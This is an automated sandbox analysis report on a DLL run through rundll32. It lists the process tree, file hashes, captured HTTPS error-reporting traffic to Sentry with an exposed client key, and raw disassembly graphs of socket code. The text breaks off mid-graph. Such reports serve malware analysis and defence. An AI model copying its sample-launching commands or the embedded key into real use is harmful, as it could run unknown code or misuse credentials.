                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.64976934.120.62.2134435328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-19 14:33:44 UTC286OUTPOST /api/4508128821837904/envelope/ HTTP/1.1
                                  x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0
                                  accept: */*
                                  host: o4508128816857088.ingest.de.sentry.io
                                  content-length: 11418
                                  2024-12-19 14:33:44 UTC11418OUTData Raw: 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 39 36 63 34 36 36 32 35 2d 66 62 38 30 2d 34 62 37 38 2d 62 30 30 34 2d 34 38 36 31 62 33 38 35 64 64 32 66 22 7d 0a 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6c 65 6e 67 74 68 22 3a 31 31 33 33 33 7d 0a 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 39 36 63 34 36 36 32 35 66 62 38 30 34 62 37 38 62 30 30 34 34 38 36 31 62 33 38 35 64 64 32 66 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 72 72 28 43 75 73 74 6f 6d 20 7b 20 6b 69 6e 64 3a 20 4f 74 68 65 72 2c 20 65 72 72 6f 72 3a 20 5c 22 43 6c 6f 73 65 64 5c 22 20 7d 29 22 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 6e 61 74 69 76 65 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 34 36 32 34 32 38 38 2e 38 34 31 33 33 32 34 2c 22 73 65 72 76 65 72 5f 6e 61 6d 65 22 3a
                                  Data Ascii: {"event_id":"96c46625-fb80-4b78-b004-4861b385dd2f"}{"type":"event","length":11333}{"event_id":"96c46625fb804b78b0044861b385dd2f","message":"Err(Custom { kind: Other, error: \"Closed\" })","platform":"native","timestamp":1734624288.8413324,"server_name":
                                  2024-12-19 14:33:45 UTC672INHTTP/1.1 429 Too Many Requests
                                  server: nginx
                                  date: Thu, 19 Dec 2024 14:33:45 GMT
                                  content-type: application/json
                                  retry-after: 60
                                  x-sentry-rate-limits: 60:default;error;security;attachment:organization:error_usage_exceeded
                                  vary: origin, access-control-request-method, access-control-request-headers,accept-encoding
                                  access-control-allow-origin: *
                                  access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                  cross-origin-resource-policy: cross-origin
                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                  via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-19 14:33:45 UTC209INData Raw: 63 36 0d 0a 7b 22 64 65 74 61 69 6c 22 3a 22 53 65 6e 74 72 79 20 64 72 6f 70 70 65 64 20 64 61 74 61 20 64 75 65 20 74 6f 20 61 20 71 75 6f 74 61 20 6f 72 20 69 6e 74 65 72 6e 61 6c 20 72 61 74 65 20 6c 69 6d 69 74 20 62 65 69 6e 67 20 72 65 61 63 68 65 64 2e 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 61 66 66 65 63 74 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 65 6e 74 72 79 2e 69 6f 2f 70 72 6f 64 75 63 74 2f 61 63 63 6f 75 6e 74 73 2f 71 75 6f 74 61 73 2f 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 7d 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: c6{"detail":"Sentry dropped data due to a quota or internal rate limit being reached. This will not affect your application. See https://docs.sentry.io/product/accounts/quotas/ for more information."}0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.64993334.120.62.2134435328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-19 14:34:51 UTC286OUTPOST /api/4508128821837904/envelope/ HTTP/1.1
                                  x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0
                                  accept: */*
                                  host: o4508128816857088.ingest.de.sentry.io
                                  content-length: 12516
                                  2024-12-19 14:34:51 UTC12516OUTData Raw: 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 62 33 64 30 38 34 35 36 2d 65 33 38 32 2d 34 35 38 66 2d 62 61 37 65 2d 38 38 36 35 35 36 34 30 61 36 36 32 22 7d 0a 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6c 65 6e 67 74 68 22 3a 31 32 34 33 31 7d 0a 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 62 33 64 30 38 34 35 36 65 33 38 32 34 35 38 66 62 61 37 65 38 38 36 35 35 36 34 30 61 36 36 32 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 72 72 28 43 75 73 74 6f 6d 20 7b 20 6b 69 6e 64 3a 20 4f 74 68 65 72 2c 20 65 72 72 6f 72 3a 20 5c 22 43 6c 6f 73 65 64 5c 22 20 7d 29 22 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 6e 61 74 69 76 65 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 34 36 32 34 33 35 36 2e 31 30 34 32 35 31 31 2c 22 73 65 72 76 65 72 5f 6e 61 6d 65 22 3a
                                  Data Ascii: {"event_id":"b3d08456-e382-458f-ba7e-88655640a662"}{"type":"event","length":12431}{"event_id":"b3d08456e382458fba7e88655640a662","message":"Err(Custom { kind: Other, error: \"Closed\" })","platform":"native","timestamp":1734624356.1042511,"server_name":
                                  2024-12-19 14:34:52 UTC672INHTTP/1.1 429 Too Many Requests
                                  server: nginx
                                  date: Thu, 19 Dec 2024 14:34:51 GMT
                                  content-type: application/json
                                  retry-after: 60
                                  x-sentry-rate-limits: 60:default;error;security;attachment:organization:error_usage_exceeded
                                  vary: origin, access-control-request-method, access-control-request-headers,accept-encoding
                                  access-control-allow-origin: *
                                  access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                  cross-origin-resource-policy: cross-origin
                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                  via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-19 14:34:52 UTC209INData Raw: 63 36 0d 0a 7b 22 64 65 74 61 69 6c 22 3a 22 53 65 6e 74 72 79 20 64 72 6f 70 70 65 64 20 64 61 74 61 20 64 75 65 20 74 6f 20 61 20 71 75 6f 74 61 20 6f 72 20 69 6e 74 65 72 6e 61 6c 20 72 61 74 65 20 6c 69 6d 69 74 20 62 65 69 6e 67 20 72 65 61 63 68 65 64 2e 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 61 66 66 65 63 74 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 65 6e 74 72 79 2e 69 6f 2f 70 72 6f 64 75 63 74 2f 61 63 63 6f 75 6e 74 73 2f 71 75 6f 74 61 73 2f 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 7d 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: c6{"detail":"Sentry dropped data due to a quota or internal rate limit being reached. This will not affect your application. See https://docs.sentry.io/product/accounts/quotas/ for more information."}0


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\loaddll64.exe
                                  Wow64 process (32bit):false
                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll"
                                  Imagebase:0x7ff662d70000
                                  File size:165'888 bytes
                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
                                  Imagebase:0x7ff64e0d0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:09:33:31
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:09:33:34
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:09:33:36
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 5860 -s 428
                                  Imagebase:0x7ff693eb0000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:15
                                  Start time:09:33:42
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6728 -s 428
                                  Imagebase:0x7ff693eb0000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:1.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:22%
                                    Total number of Nodes:59
                                    Total number of Limit Nodes:1
                                    execution_graph 2506 7ffd9462ded0 2507 7ffd9462e108 2506->2507 2512 7ffd9462defd 2506->2512 2513 7ffd9467b350 2507->2513 2509 7ffd9462e114 2509->2509 2510 7ffd9462e0f4 2511 7ffd9462e0e7 WakeByAddressSingle 2511->2510 2512->2510 2512->2511 2514 7ffd9467b363 2513->2514 2515 7ffd9467b390 2514->2515 2516 7ffd9467b3bc WaitOnAddress 2514->2516 2515->2509 2516->2514 2517 7ffd9467b3da GetLastError 2516->2517 2517->2514 2525 7ffd9462e800 2528 7ffd94641730 accept 2525->2528 2529 7ffd946417cd WSAGetLastError 2528->2529 2530 7ffd94641791 2528->2530 2539 7ffd9462e812 2529->2539 2531 7ffd9464183f closesocket 2530->2531 2532 7ffd946417a8 2530->2532 2531->2539 2533 7ffd9464189b 2532->2533 2532->2539 2548 7ffd9467b020 2532->2548 2540 7ffd94640f70 WSASocketW 2533->2540 2537 7ffd946418e6 bind 2538 7ffd94641925 WSAGetLastError closesocket 2537->2538 2537->2539 2538->2539 2541 7ffd94640fba WSAGetLastError 2540->2541 2544 7ffd94641037 2540->2544 2542 7ffd94640fd0 WSASocketW 2541->2542 2543 7ffd94640fc7 2541->2543 2545 7ffd9464102f WSAGetLastError 2542->2545 2546 7ffd94640ff6 SetHandleInformation 2542->2546 2543->2542 2543->2544 2544->2537 2544->2539 2545->2544 2546->2544 2547 7ffd94641011 GetLastError closesocket 2546->2547 2547->2544 2549 7ffd9467b031 2548->2549 2550 7ffd9467b02c 2548->2550 2553 7ffd9467b070 2549->2553 2550->2533 2555 7ffd9467b092 2553->2555 2556 7ffd9467b116 2553->2556 2554 7ffd9467b061 2554->2533 2555->2554 2555->2556 2557 7ffd9467b0f1 WaitOnAddress 2555->2557 2556->2554 2559 7ffd9467b1d7 WakeByAddressAll 2556->2559 2557->2555 2558 7ffd9467b10f GetLastError 2557->2558 2558->2555 2559->2554 2518 7ffd9465fbc0 2519 7ffd9465fbe1 2518->2519 2520 7ffd9465fbdc 2518->2520 2522 7ffd9465fc00 2520->2522 2523 7ffd9465fc23 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2522->2523 2524 7ffd9465fc97 2522->2524 2523->2524 2524->2519 2560 7ffd943a1e0b 2561 7ffd943a1e26 closesocket closesocket 2560->2561 2562 7ffd943a1e18 2560->2562 2563 7ffd943a1e43 2561->2563 2562->2561 2495 7ffd944bfd80 2496 7ffd944bffc3 2495->2496 2498 7ffd944bfd99 2495->2498 2499 7ffd944bfdd0 2498->2499 2500 7ffd944bffda 2498->2500 2501 7ffd944bffe3 2498->2501 2503 7ffd9462e680 send 2498->2503 2499->2496 2499->2498 2500->2496 2502 7ffd944c0012 2501->2502 2502->2501 2504 7ffd9462e6af WSAGetLastError 2503->2504 2505 7ffd9462e6a5 2503->2505 2504->2498 2505->2498

                                    Non-executed Functions

                                    Function 00007FFD94641730 Relevance: 9.1, APIs: 6, Instructions: 146networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: ErrorLastclosesocket$acceptbind
                                    • String ID:
                                    • API String ID: 1804377370-0
                                    • Opcode ID: c7b51e8292a29a5a90fcb79761d37cf21f9b0f0c8f198b9ace2e4d1acedf13af
                                    • Instruction ID: e172f601cddf81732ccf5c8b79674a039972dd67d12f5b1a7d6af1d6280fb6ce
                                    • Opcode Fuzzy Hash: c7b51e8292a29a5a90fcb79761d37cf21f9b0f0c8f198b9ace2e4d1acedf13af
                                    • Instruction Fuzzy Hash: 9451B371B1C28186EB748F55E0953FAB3A0EF85B64F10D135EAAA03795EB3CE591CB40
                                    Function 00007FFD9465FC00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                    • String ID:
                                    • API String ID: 2933794660-0
                                    • Opcode ID: 12fd8a9f89629ea2447222c8c74297c2fbcce32a864f8b5c802af7c08dfa3724
                                    • Instruction ID: 204b09f8eb384ca7b041f59d4c1f3dbc3845bc46426ccc089143aba2d8594bbb
                                    • Opcode Fuzzy Hash: 12fd8a9f89629ea2447222c8c74297c2fbcce32a864f8b5c802af7c08dfa3724
                                    • Instruction Fuzzy Hash: 63115E32B25F058AEB10DFA0E8A42B833A4FB5A758F044E31DA2D877A5DF78E154C340
                                    Function 00007FFD9466ED40 Relevance: 5.7, Strings: 4, Instructions: 688COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 117 7ffd9466ed40-7ffd9466ed51 118 7ffd9466ed57-7ffd9466ed5a 117->118 119 7ffd9466ee25-7ffd9466ee27 call 7ffd9460c450 117->119 118->119 120 7ffd9466ed60-7ffd9466edb3 118->120 122 7ffd9466ee2c-7ffd9466ee31 119->122 123 7ffd9466ee3b-7ffd9466ee6b call 7ffd9460c450 120->123 124 7ffd9466edb9-7ffd9466edbb 120->124 125 7ffd9466ee36 call 7ffd9460c450 122->125 131 7ffd9466efa1-7ffd9466efab call 7ffd9464d4d0 123->131 132 7ffd9466ee71-7ffd9466eea4 123->132 124->123 127 7ffd9466edbd-7ffd9466edcd 124->127 125->123 127->125 130 7ffd9466edcf-7ffd9466edd2 127->130 133 7ffd9466edd4-7ffd9466ede9 130->133 134 7ffd9466edeb 130->134 145 7ffd9466f57a-7ffd9466f590 131->145 136 7ffd9466eed8-7ffd9466eee3 132->136 137 7ffd9466eea6-7ffd9466eec1 132->137 138 7ffd9466eded-7ffd9466ee10 call 7ffd944b20a0 133->138 134->138 142 7ffd9466ef0d-7ffd9466ef1a 136->142 143 7ffd9466eee5-7ffd9466ef06 136->143 140 7ffd9466f021-7ffd9466f02a 137->140 141 7ffd9466eec7-7ffd9466eecb 137->141 138->122 158 7ffd9466ee12-7ffd9466ee24 138->158 148 7ffd9466f02c-7ffd9466f03c call 7ffd9466dde0 140->148 149 7ffd9466f045-7ffd9466f049 140->149 146 7ffd9466eed1-7ffd9466eed3 141->146 147 7ffd9466efb0-7ffd9466efc8 141->147 142->131 153 7ffd9466ef20-7ffd9466ef6b 142->153 150 7ffd9466ef6d-7ffd9466ef74 143->150 151 7ffd9466ef08 143->151 156 7ffd9466f007-7ffd9466f009 146->156 155 7ffd9466efd0-7ffd9466f005 147->155 159 7ffd9466f04f-7ffd9466f0a2 148->159 167 7ffd9466f03e-7ffd9466f040 148->167 149->159 150->131 154 7ffd9466ef76-7ffd9466ef88 150->154 151->131 153->131 153->150 154->131 161 7ffd9466ef8a-7ffd9466ef9b 154->161 155->155 155->156 156->140 162 7ffd9466f00b-7ffd9466f01c 156->162 160 7ffd9466f0d7-7ffd9466f0dc 159->160 165 7ffd9466f0c3-7ffd9466f0d1 160->165 166 7ffd9466f0de-7ffd9466f123 160->166 161->131 164 7ffd9466f591-7ffd9466f5b2 call 7ffd944d44a0 161->164 162->140 176 7ffd9466f7c1-7ffd9466f7d3 call 7ffd9464d4e0 164->176 177 7ffd9466f5b8-7ffd9466f60c call 7ffd9466e560 164->177 165->160 168 7ffd9466f55d 165->168 169 7ffd9466f1a1-7ffd9466f1b5 166->169 171 7ffd9466f562-7ffd9466f576 167->171 168->171 172 7ffd9466f250-7ffd9466f270 169->172 173 7ffd9466f1bb-7ffd9466f1d2 169->173 171->145 178 7ffd9466f272-7ffd9466f280 172->178 179 7ffd9466f22e-7ffd9466f241 172->179 175 7ffd9466f1e0-7ffd9466f221 173->175 175->175 180 7ffd9466f223-7ffd9466f22c 175->180 176->145 192 7ffd9466f612-7ffd9466f633 177->192 193 7ffd9466f75f-7ffd9466f77c 177->193 183 7ffd9466f282-7ffd9466f298 178->183 185 7ffd9466f29c-7ffd9466f29f 178->185 182 7ffd9466f243 179->182 179->183 180->178 180->179 182->185 183->185 188 7ffd9466f2a1-7ffd9466f2b7 185->188 189 7ffd9466f2c0-7ffd9466f2c6 185->189 190 7ffd9466f2c8-7ffd9466f2e3 188->190 189->190 191 7ffd9466f31f-7ffd9466f329 189->191 194 7ffd9466f330-7ffd9466f417 190->194 195 7ffd9466f2e5-7ffd9466f31d 190->195 191->194 198 7ffd9466f6a8-7ffd9466f6ab 192->198 196 7ffd9466f77e-7ffd9466f79a 193->196 197 7ffd9466f7d8-7ffd9466f7e2 193->197 199 7ffd9466f419-7ffd9466f422 194->199 200 7ffd9466f448-7ffd9466f456 194->200 195->194 196->197 201 7ffd9466f79c-7ffd9466f7bc call 7ffd944d44b0 196->201 197->145 202 7ffd9466f6ad 198->202 203 7ffd9466f6cc-7ffd9466f70e call 7ffd944b1da0 198->203 205 7ffd9466f430-7ffd9466f446 199->205 206 7ffd9466f464-7ffd9466f47a 200->206 207 7ffd9466f458-7ffd9466f460 200->207 201->145 209 7ffd9466f6b0-7ffd9466f6c8 202->209 215 7ffd9466f710-7ffd9466f716 203->215 216 7ffd9466f738-7ffd9466f747 203->216 205->200 205->205 211 7ffd9466f0b0-7ffd9466f0bf 206->211 212 7ffd9466f480-7ffd9466f4a9 206->212 207->206 209->209 214 7ffd9466f6ca 209->214 211->165 217 7ffd9466f520-7ffd9466f558 212->217 218 7ffd9466f4ab-7ffd9466f4ba 212->218 214->203 219 7ffd9466f720-7ffd9466f736 215->219 220 7ffd9466f640-7ffd9466f6a2 216->220 221 7ffd9466f74d-7ffd9466f75a 216->221 217->165 222 7ffd9466f130-7ffd9466f19d 218->222 223 7ffd9466f4c0-7ffd9466f4c5 218->223 219->216 219->219 220->193 220->198 221->220 222->169 223->222 224 7ffd9466f4cb-7ffd9466f4d2 223->224 225 7ffd9466f4e0-7ffd9466f50a 224->225 225->225 226 7ffd9466f50c 225->226 226->169
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: d3daacb50e6a5e86a45ee54e19aca212472062c4860bb173f1bcb69688a0aab6
                                    • Instruction ID: 00e8c64cd147a9a8661221adb39d53a30500ac9a482300d461d655755b2bec95
                                    • Opcode Fuzzy Hash: d3daacb50e6a5e86a45ee54e19aca212472062c4860bb173f1bcb69688a0aab6
                                    • Instruction Fuzzy Hash: 2A425AA2B18B8582EB248FA9A4606A96761F796BF4F109331DEBD137D6DF3CD141C300
                                    Function 00007FFD9466F7F0 Relevance: 5.6, Strings: 4, Instructions: 593COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 227 7ffd9466f7f0-7ffd9466f80b 228 7ffd9466f811-7ffd9466f844 227->228 229 7ffd9466f935-7ffd9466f93c call 7ffd9464d4d0 227->229 231 7ffd9466f87d-7ffd9466f888 228->231 232 7ffd9466f846-7ffd9466f866 228->232 241 7ffd9466fee2-7ffd9466fef5 229->241 236 7ffd9466f8b2-7ffd9466f8bf 231->236 237 7ffd9466f88a-7ffd9466f8ab 231->237 234 7ffd9466f9b1-7ffd9466f9b5 232->234 235 7ffd9466f86c-7ffd9466f870 232->235 242 7ffd9466f9d0-7ffd9466f9d4 234->242 243 7ffd9466f9b7-7ffd9466f9c7 call 7ffd9466dde0 234->243 244 7ffd9466f941-7ffd9466f959 235->244 245 7ffd9466f876-7ffd9466f878 235->245 236->229 240 7ffd9466f8c1-7ffd9466f90c 236->240 238 7ffd9466f8ad 237->238 239 7ffd9466f90e-7ffd9466f918 237->239 238->229 239->229 247 7ffd9466f91a-7ffd9466f92f 239->247 240->229 240->239 246 7ffd9466f9da-7ffd9466fa33 242->246 243->246 255 7ffd9466f9c9-7ffd9466f9cb 243->255 248 7ffd9466f960-7ffd9466f995 244->248 250 7ffd9466f997-7ffd9466f999 245->250 251 7ffd9466fa67-7ffd9466fa6c 246->251 247->229 252 7ffd9466fef6-7ffd9466ff14 call 7ffd944d44a0 247->252 248->248 248->250 250->234 253 7ffd9466f99b-7ffd9466f9ac 250->253 256 7ffd9466fa53-7ffd9466fa61 251->256 257 7ffd9466fa6e-7ffd9466fac7 251->257 265 7ffd9467011c-7ffd9467012d call 7ffd9464d4e0 252->265 266 7ffd9466ff1a-7ffd9466ff6f call 7ffd9466e560 252->266 253->234 259 7ffd9466fecf-7ffd9466fede 255->259 256->251 260 7ffd9466fec5-7ffd9466feca 256->260 261 7ffd9466fb05-7ffd9466fb19 257->261 259->241 260->259 263 7ffd9466fb1f-7ffd9466fb35 261->263 264 7ffd9466fbb0-7ffd9466fbd1 261->264 268 7ffd9466fb40-7ffd9466fb82 263->268 270 7ffd9466fbd3-7ffd9466fbe1 264->270 271 7ffd9466fb91-7ffd9466fba5 264->271 265->241 280 7ffd946700c2-7ffd946700df 266->280 281 7ffd9466ff75-7ffd9466ff96 266->281 268->268 275 7ffd9466fb84-7ffd9466fb8f 268->275 272 7ffd9466fbe3-7ffd9466fbfa 270->272 273 7ffd9466fbfe-7ffd9466fc01 270->273 271->272 277 7ffd9466fba7 271->277 272->273 278 7ffd9466fc03-7ffd9466fc1a 273->278 279 7ffd9466fc20-7ffd9466fc26 273->279 275->270 275->271 277->273 282 7ffd9466fc28-7ffd9466fc3f 278->282 279->282 283 7ffd9466fc7b 